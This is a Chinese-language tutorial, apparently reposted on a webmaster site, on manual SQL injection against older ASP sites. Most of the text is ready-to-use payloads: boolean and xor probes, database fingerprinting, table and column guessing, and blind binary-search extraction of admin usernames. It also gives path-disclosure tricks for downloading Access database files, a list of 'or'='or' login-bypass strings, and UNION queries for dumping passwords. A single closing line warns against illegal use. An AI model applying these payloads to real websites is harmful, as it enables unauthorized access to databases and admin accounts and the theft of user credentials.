| 1、加入單引號 ’提交, 結果:如果出現錯誤提示,則該網站可能就存在注入漏洞。 2、數字型判斷是否有注入; 語句:and 1=1 ;and 1=2 (經典)、' and '1'=1(字符型) 結果:分別返回不同的頁面,說明存在注入漏洞. 分析:and 的意思是“和”如果沒有過濾我們的語句,and 1=1就會被代入SQL查詢語句進行查詢, 如果and前后的兩條語句都是真的話就不會出錯,但如果前后語句有一個為假的話,程序就會暴錯。 也就表明程序有注入漏洞 防注入解決辦法: 1>使用or 2>1 ; or 1>2來進行判斷 結果:分別返回不同的頁面,說明存在注入漏洞. 分析:or注入只要求前后兩個語句只要有一個正確就為真,如果前后兩個語句都是正確的,反而為假。 記住:or注入時,or后面的語句如果是正確的,則返回錯誤頁面!如果是錯誤,則返回正確頁面 ,說明存在注入點。 2> 使用xor 1=1; xor 1=2 結果:分別返回不同的頁面,說明存在注入漏洞. 分析:xor 代表著異或,意思即連接的表達式僅有一個為真的時候才為真。 記住:xor注入時,xor后面的語句如果是正確的,則返回錯誤頁面積,如果是錯誤,則返回正確 頁面,說明存在注入點。 3>把and 1=1轉換成URL編碼形式后在提交 and 1=1 URL編碼:%41%4E%44%20%%31%3D%31 4>使用-1;-0 分析:如果返回的頁面和前面不同,是另一則新聞,則表示有注入漏洞,是數字型的注入漏洞;在 URL地址后面加上 -0,URL變成 news.asp?id=123-0,返回的頁面和前面的頁面相同,加上-1,返回錯誤頁面,則也表示存在注入漏洞. 3、字符型判斷是否有注入: 語句:' and '1'=1;' and '1=2(經典) 結果:分別返回不同的頁面,說明存在注入漏洞. 分析:加入' and '1'=1返回正確頁面,加入' and '1=2返回錯誤頁面,說明有注入漏同。 防注入解決辦法: 在URL的地址后面加上'%2B'(字符型) 分析:URL地址變為:news.asp?id=123'%2B',返回的頁面和1同;加 上'2%2B'asdf,URL地址變為:news.asp?id=123'%2Basdf,返回的頁面和1 不同,或者說未發現該條記錄,或者錯誤,則表示存在注入點,是文本型的。 搜索型判斷是否有注入: 簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索',如果出錯,說明90%存在這個漏洞。然后搜索%,如果正常返回,說明95%有洞了。 說明:加入如"&"、"["、"]"、"%"、"$"、"@"等特殊字符,都可以實現,如果出現錯誤,說明有問題。 操作: 搜索一個關鍵字,比如2006吧,正常返回所有2006相關的信息,再搜索2006%'and 1=1 and '%'='和 2006%'and 1=2 and '%'=',存在異同的話,就是100%有洞了。關鍵字%' and 1=1 and '%'='% 關鍵字%' and 1=2 and '%'='% 將and 1=1 換成注入語句就可以了 判斷數據庫類型: and user>0 例如:showdetail.asp?id=49 ;and user>0 如果是ACCESS數據庫,那么返回的錯誤里一般會有"Microsoft JET Database"關鍵定,如果是MSSQL數 據庫的話返回的錯誤提示里一般會含有"SQL Server"關鍵了. 猜表名 and exists (select * from 表名) 說明:意思與上面一樣,只是用的語名不一樣。 猜列名 and (select count(列名) from 表名)>0 說明:如果我們輸入的列名猜解正確否反回正常頁面 猜長度 and (select top 1 len(username) from admin)>0 說明:如果我們輸入的最后一位數據返回錯誤,而錯誤前一位數字返回正確,說明我所猜解的長度 為正確。 猜內容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii碼1-128 說明:如果我們輸入的最后一位數據返回錯誤,而錯誤前一位數字返回正確,說明我所猜解的數字正確。(可以使用折半法猜內容) 折半法:最小值與最大值差的一半,比如輸入50返正確,輸入100返回錯誤,折半后輸入75。 兩種常見爆庫 1、%5c 2、conn.asp %5c暴庫 把二級目錄中間的/換成%5c EY: otherweb ... s.asp?BigClassName=職 責范圍&BigClassType=1 如果你能看到:’E:\ahttc040901 \otherweb\dz\database\iXuEr_Studio.asa’不是一 個有效的 路徑。 確定路徑名稱拼寫是否正確, 以及是否 連接到文件存放的服務器。 這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行 . conn.asp暴庫 這個也是比較老的漏洞,利用價值不大 常見的:'or'='or'萬能密碼登陸 ’or’=’or’這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有 : ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’ a’=’a 一個很老的利用方法,主要用于一些比較老的網站。 聯合查詢注入(union查詢) 操作步驟: 1>在正常語句后臺加入 and 1=2 union select * form 表名,其中*號代表字段數量,從1一直追加 (and 1=2 union select 1,2,3,4 form 表名)如果字段數正確就會有暴錯 2>在頁面顯示數字的地方用真實得到的字段名代替,如:username,password. 3>在頁面字段值處暴出真實的數據庫字段值。 查找后臺地址,找到后臺用得到的用戶管理員的帳戶與密碼進行登陸. 建議大家先手工檢測,熟練掌握基本注入方法,來提高自己的基本注入知識。 警告:不要用做非法用途,不要做有損國家的任何事情! |
免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!
掃一掃,關注站長網微信
大家都在看
